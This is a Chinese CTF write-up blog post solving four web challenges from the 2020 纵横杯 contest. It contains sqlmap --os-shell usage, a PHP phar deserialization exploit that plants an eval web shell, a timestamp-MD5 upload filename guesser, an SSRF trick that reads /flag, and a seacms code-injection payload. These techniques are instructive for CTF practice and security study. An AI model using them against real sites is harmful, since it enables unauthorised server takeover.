title: 纵横杯2020 web wp
date: 2020-12-26 18:19:03
tags: CTF
categories: 比赛
link:https://yq1ng.github.io/
图片是新博客截图过来的,可能糊了,可以去新博客地址看
WankkoRee师傅、Mr.水函师傅带飞我,这次比赛学到不少东西,先放个排名,膜拜师傅们
第一次ak web,后援团的大师傅们的思路都很骚,多多学习,今天被引号闭合搞了两次,以后注意,phar的闭合与cms的闭合
easyci
早上起来晚了,队友说这个sqlmap就能跑,当时我还不信,没见过比赛还能用sqlmap的。起床后自己试了试真的是欸,但是没用,跑出来的账号密码登陆没东西,flag也不在数据库,那就要getshell了,但是不知道绝对路径,马子写不上去,从团长那里得到yu师傅提示,读取配置文件/etc/apache2/sites-enabled/000-default.conf
,得到网站绝对路径/var/sercet/html
,用sqlmap进行getshell:py2 .\sqlmap.py -r ..\a.txt --os-shell
手动选择路径,尽情玩耍
#/etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/sercet/html
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
hello_php
扫描目录,发现www.zip备份文件,下载后审计源码,得到登陆账号密码:admin,admin888,登陆后的页面有上传文件,且在index.php页面发现file_exists函数,使用phar进行反序列化攻击,exp如下:
<?php
/**
* @Author: yq1ng
* @Date: 2020-12-26
* @challenges: hello-php
*/
class Config{
public $title;
public $comment;
public $logo_url;
public function __construct(){
global $title;
global $comment;
global $logo_url;
$this->title= "'?><?php eval(\$_POST[1]);?>";
$this->comment = "yq1ng";
$this->logo_url = $logo_url;
}
}
@unlink("phar1.phar");//unlink() 函数删除文件。
$phar = new Phar("phar.phar");
$phar->startBuffering();//开始缓冲Phar写操作
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$A=new Config;
$phar->setMetadata($A);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//以字符串的形式添加一个文件到phar档案添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
由于上传文件的命名方式为时间戳的md5,所以再写一个获取时间戳md5的脚本,用来尝试上传后文件名,脚本使用方式为,先开启脚本,紧接着上传文件,然后挨个试文件名,上传后寻找文件名,未出现404则成功
import time
import hashlib
def md5vale(key):
input_name = hashlib.md5()
input_name.update(key.encode("utf-8"))
print(input_name.hexdigest())
for i in range(5):
a=str(int(time.time()))
md5vale(a)
time.sleep(1)
然后使用phar伪协议读取
进入config.php进行rce
查看flag发现并不行,没有权限,使用蚁剑插件进行bypass,上次网络不错一口气把蚁剑插件全部download了,也不会用,这次跟着团长学会了这个插件
ezcms
https://www.cnblogs.com/Spec/p/11188198.html
www.zip下载源码,使用弱口令登陆后台:URL/adm1n/login.php,admin,admin868
在模块管理的采集管理处进行ssrf,使用file协议读取发现被ban
尝试使用:<yq1ng><a href="httpxxx://../../../../../../flag">123</a></yq1ng>
提交后点击采集测试,得到flag
大家一起来审代码
rce:https://github.com/ciweiin/seacms/issues/11
www.zip下载源码,但是此cms的漏洞在7月22日的github上由reallws发布,直接rce即可
查看源码发现admin被改为adm1n,进入后台使用默认密码进入URL/adm1n/login.php:admin,admin
在系统-百度推送处存在rce
Payload:";system(phpinfo());?>#